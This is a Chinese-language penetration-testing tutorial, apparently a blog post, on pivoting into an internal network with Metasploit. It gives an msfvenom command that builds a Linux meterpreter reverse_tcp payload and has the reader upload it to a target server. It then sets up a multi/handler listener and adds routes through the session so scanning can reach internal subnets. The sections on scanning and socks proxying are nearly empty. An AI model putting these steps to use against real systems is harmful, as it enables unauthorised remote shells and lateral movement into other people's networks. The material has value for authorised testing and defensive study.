内网渗透-基于MSF的路由转发+内网探测实战

0x01 反弹MSF类型的Shell

  • 步骤一:服务器:Linux

    1
    2
    生成msf shell
    msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST= LPORT=8080 -f elf > payload.elf
  • 步骤二:上传payload.elf到目标服务器,添加权限chomd 777

  • 步骤三:msf开始监听

    1
    2
    3
    4
    5
    6
    root@iZ2ze9muqv7y1i98lqo7ppZ:~# 
    use exploit/multi/handler
    set payload linux/x64/meterpreter/reverse_tcp
    set lhost 172.24.37.0
    set lport 8080
    exploit -j
    • 小技巧:

      1
      2
      我们保存为.rc 方便我们快捷启动msf会话
      # msfconsole -r xxx.rc

0x02 添加内网路由

  • 步骤一:获取内网网段:

    1
    2
    获取内网网段:
    # run get_local_subnets
  • 步骤二:添加去往目标网段的转发路由:

1
2
3
4
5
6
7
8
9
10
11
12
#在全局给指定的session加
route add 192.168.11.0 255.255.255.0 1 #在session1中添加到达192.168.11.0网段的路由
route add 192.168.12.0 255.255.255.0 1 #在session1中添加到达192.168.12.0网段的路由
route add 0.0.0.0 0.0.0.0 1 #在session1中添加到达0.0.0.0/24网段的路由
route del 192.168.12.0 255.255.255.0 2 #在session2中删除到达192.168.12.0网段的路由
route print #打印路由信息


#也可以在进入session下添加路由
run autoroute -s 192.168.11.0/24 #添加到达192.168.11.0网段的路由
run autoroute -s 192.168.11.0/24 #添加到达192.168.12.0网段的路由
run autoroute -p #打印路由信息
- 注意:在实际的内网渗透中,我们可以直接添加到 0.0.0.0/24的路由,这样,只要该被控主机可达的地址就都可达!
  • 步骤三:查看路由的添加情况:

    • run autoroute -p

0x03 msf内网探测

  • 我们扫描一下这个段的端口:

  • 我们扫内网web服务:

0x04 socks 代理配置

  • msf代理设置:

    • 返回后台:backgroud

  • 就可以本地内网漫游了。

0x05 总结

  • Linux服务器下通过msf进行内网探测攻击
    1、msf反弹shell,建立会话连接
    2、通过msf获取目标服务器的网段
    3、之后用background命令,将meterpretershell的session放到后台中运行
    4、在后台中,然后调用nmap等各种模块进行横向的扫描或者攻击。
    5、配置socks5代理,在本地内网漫游。